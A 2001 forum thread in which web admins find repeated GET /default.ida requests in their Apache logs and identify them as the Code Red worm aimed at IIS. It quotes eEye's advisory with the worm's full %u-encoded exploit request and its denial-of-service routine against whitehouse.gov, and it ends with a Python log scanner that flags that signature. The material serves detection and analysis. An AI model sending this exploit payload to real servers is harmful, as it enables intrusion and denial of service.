-
verrry interesting Apache logsnip
Look at this:
szptt170.szptt.net.cn - - [19/Jul/2001:10:45:59 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
Hmmm. I might guess that this is a buffer overrun attempt; I cannot read raw machine code (except for the no-ops and the one unconditional jump I see there). What IS this guy doing, do you suppose? Is that an Apache attack or intended for IIS, or what? Anybody seen it before?
Thanks, Ray
[ 19 July 2001: Message edited by: posterboy ]
ray@raymondjones.net
HTTP://www.raymondjones.net
-
you could be right about the buffer overflow...
however, i'm not sure.
generally, if you try to overflow a buffer, you put garbage text, and then you put your commands...
that looks like garbage, and then machine code...
does %u perhaps indicate machine code?
if so, then see if you can decode it
Be what you would seem to be - or, if you'd like it put more simply - never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise. --Lewis Carroll
-
61.135.53.8 - - [19/Jul/2001:11:55:16 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
206.65.190.134 - - [19/Jul/2001:11:58:46 -0500] "GET /themes/Green/logo.gif HTTP/1.1" 304 -
206.65.190.134 - - [19/Jul/2001:11:58:47 -0500] "GET /index.php HTTP/1.1" 200 15595
209.116.117.194 - - [19/Jul/2001:12:16:47 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
195.184.235.226 - - [19/Jul/2001:12:18:58 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
212.19.62.202 - - [19/Jul/2001:12:48:00 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205
I don't know what the he!! this is supposed to do. I tried it on my own server but just got a 404 error.
[ 19 July 2001: Message edited by: The Whizzard ]
-
OK, this is getting werser and werser. I now have had this same NNNNNNNN (machine code) come from all the below addresses, and more. Is this something going wrong here locally, or are these spoofed addies, or what do you think?
n481p012.adsl.highway.telekom.at
62.254.162.177
203.145.135.11
1cust242.tnt3.erie.pa.da.uu.net
vector.fnal.gov
josheph.excite.com
24-29-154-30.nyc.rr.com
skinfillill.byu.edu
ajh444yqy12e.bc.hsia.telus.net
dinodung.kennesaw.edu
e3.wdata.com
There are maybe 15 more I didn't bother to C&P, but they all are identical. Apache is sending them all a 404 as I certainly don't have anything named default.ida, nor is the request properly formed; it ought to be something like GET / HTTP/1.0, and then the page, right?
I tried a few of these addresses.
dinodung.kennesaw.edu certainly does ping, as does e3.wdata.com, and some others. They are live machines, currently active on the internet. HEEEELLLLLPPPPPPP!!!!!!!! I don't understand this at all. Thanks, Ray
ray@raymondjones.net
HTTP://www.raymondjones.net
-
me too:
209.147.47.82 - - [19/Jul/2001:11:56:29 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
217.0.129.223 - - [19/Jul/2001:14:52:41 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
202.127.12.38 - - [19/Jul/2001:15:02:39 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
63.251.93.43 - - [19/Jul/2001:15:28:37 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
64.219.102.105 - - [19/Jul/2001:15:51:37 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
168.8.80.8 - - [19/Jul/2001:16:05:41 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
66.26.212.131 - - [19/Jul/2001:16:32:02 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
168.169.162.33 - - [19/Jul/2001:16:44:51 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
211.50.29.89 - - [19/Jul/2001:17:05:34 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
211.39.34.211 - - [19/Jul/2001:17:06:24 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
203.235.44.30 - - [19/Jul/2001:17:11:28 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 329
I've got similar logs on two machines.
[ 19 July 2001: Message edited by: spickus ]
The UNIX philosophy basically involves giving you enough rope to
hang yourself. And then a couple of feet more, just to be sure.
-
I looked up apache error 400 - bad request.
http://www.bignosebird.com/apache/a5.shtml
-
Yes, it is a malformed request. It can't answer GET /default.ida; it needs to look like GET / HTTP/1.0. However, in my initial post, note that I am sending them a 404, page not found error. I don't have a grip on that, either.
Ray
ray@raymondjones.net
HTTP://www.raymondjones.net
-
OK, here's something I found on the net, about the "Code-Red" worm. I have no idea that this is related, but, it's worth reading. http://news.cnet.com/news/0-1003-200...92.html?tag=lh
ray@raymondjones.net
HTTP://www.raymondjones.net
-
I think that's a different exploit. Man, I'm getting hammered with these.
[ 19 July 2001: Message edited by: spickus ]
-
I just counted, I have 60 since this morning at 10:30 AM East Coast. Sheesh!!!!
Can anybody help us with what's going on, please?
ray@raymondjones.net
HTTP://www.raymondjones.net
-
I am pretty sure that that is looking for an IIS exploit. When I get off of work I will see if I still have the email I got about this. I think that what posterboy posted was right and it is the Code-Red worm.
-
I am now satisfied that this is indeed the "Code Red" thingy. This reference to the .ida stuff pulled me into that notion, as pointed to by spickus. Thank you for that, and I will relax a bit, as this doesn't target Apache at all. This thing is a bandwidth eater, but I can survive a few hits to the page, this is a hobby for me, and nothing more. I do feel for the admins running stuff commercially, this will surely have an impact. Why do companies run that buggy IIS thing, anyway? There's a new exploit every few weeks, it seems. Thanks to all you guys for helping us with this, this is one of the best possible uses for this board. In a couple of hours, the issue has been laid to rest. Good on you.
ray@raymondjones.net
HTTP://www.raymondjones.net
-
It is the code red worm ---
How many hits do you have so far?? I have 15 in my logs from today alone.
Apparently, they used a static random seed, so the random IP addresses generated by each machine have been the same --
I've been hit 16 different times today, by different IP addresses
How many times have you been hit?!
-
From the Code Red text file:
Introduction
============
On Friday July 13th we received packet logs and information from 2 network administrators that were experiencing large amounts of attacks targeting the recent .ida vulnerability that eEye Digital Security discovered (http://www.eeye.com/html/Research/Advisories/AD20010618.html) on June 18, 2001. After reviewing the logs sent to us we determined that in fact someone had released a worm into the Internet that was spreading rapidly through IIS web servers.
The full analysis of the .ida "Code Red" worm has provided numerous new details as to the functionality and method of propagation of this worm. For instance, this worm's purpose ultimately seems to be to perform a denial of service attack against www.whitehouse.gov. Also it has been found that only US English Windows NT/2000 systems will show the defaced ("Hacked by Chinese !") web page.
We've designated this the .ida "Code Red" worm, because part of the worm is designed to deface web pages with the text "Hacked by Chinese" and also because code red mountain dew was the only thing that kept us awake all last night to be able to disassemble this exploit even further.
How to set up your IDS to detect this specific worm?
----------------------------------------------------
The following is part of the packet data that is sent for this .ida "Code Red" worm attack:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Attack www.whitehouse.gov functionality
---------------------------------------
Sooner or later every thread within the worm seems to shift its attacking focus to www.whitehouse.gov.
1. create socket and connect to www.whitehouse.gov on port 80 and send 100k bytes of data
CODEREF: seg000:000008AD WHITEHOUSE_SOCKET_SETUP
Initially the worm will create a socket and connect to 198.137.240.91 (www.whitehouse.gov/www1.whitehouse.gov) on port 80.
CODEREF: seg000:0000092F WHITEHOUSE_SOCKET_SEND
If this connection is made then the worm will create a loop that performs 18000h single byte send()'s to www.whitehouse.gov.
CODEREF: seg000:00000972 WHITEHOUSE_SLEEP_LOOP
After 18000h send()'s the worm will sleep for about 4 and a half hours. It will then repeat the attack against www.whitehouse.gov (goto step one of Attack www.whitehouse.gov functionality).
read up on the advisory...
what web server are you running? iis?
I hope you're not running apache, because that might mean that it infects apache as well...
that would suck ***...
but the file didn't say anything about it infecting apache, although that could just mean that they haven't found any code that relates to apache..
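As an added example (not code from the thread or from eEye's advisory), here is a small Python scanner that answers the "how many hits?" question from the posts above: it parses Apache common-format access log lines, flags requests matching the .ida signature quoted in the advisory, and tallies probes per source host and per response status (some servers in the thread answer 404, others 400). The log lines are constructed samples modelled on the ones posted.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$')
# .ida "Code Red" probe signature from the eEye advisory: GET /default.ida with
# a long run of N padding followed by the %u-encoded tail.
CODE_RED_RE = re.compile(r'^GET /default\.ida\?N{100,}%u9090%u6858%ucbd3%u7801')

# Constructed sample log: hosts/times modelled on the thread, request string
# as quoted in the advisory (224 N characters before the %u tail).
PROBE = ('GET /default.ida?' + 'N' * 224 +
         '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858'
         '%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff'
         '%u0078%u0000%u00=a HTTP/1.0')
SAMPLE_LOG = [
    f'szptt170.szptt.net.cn - - [19/Jul/2001:10:45:59 -0400] "{PROBE}" 404 205',
    f'209.147.47.82 - - [19/Jul/2001:11:56:29 -0500] "{PROBE}" 400 329',
    '206.65.190.134 - - [19/Jul/2001:11:58:47 -0500] "GET /index.php HTTP/1.1" 200 15595',
    f'209.147.47.82 - - [19/Jul/2001:13:02:11 -0500] "{PROBE}" 400 329',
    'this line is not in common log format',
]

def parse_line(line):
    # Fields of one common-log-format line, or None if it does not parse.
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_code_red(request):
    # True when the request field carries the worm's .ida signature.
    return CODE_RED_RE.match(request) is not None

def summarize(lines):
    # Tally probes per source host and per HTTP status; Apache rejects the
    # malformed query either way, so a 404 or a 400 both mean "not vulnerable".
    per_host, per_status = Counter(), Counter()
    other = unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
        elif is_code_red(rec['request']):
            per_host[rec['host']] += 1
            per_status[rec['status']] += 1
        else:
            other += 1
    return {'hits': sum(per_host.values()), 'hosts': dict(per_host),
            'statuses': dict(per_status), 'other': other, 'unparsed': unparsed}
```

Pointing `summarize` at the real access_log (one line per iteration) gives the per-host counts the posters were comparing by hand.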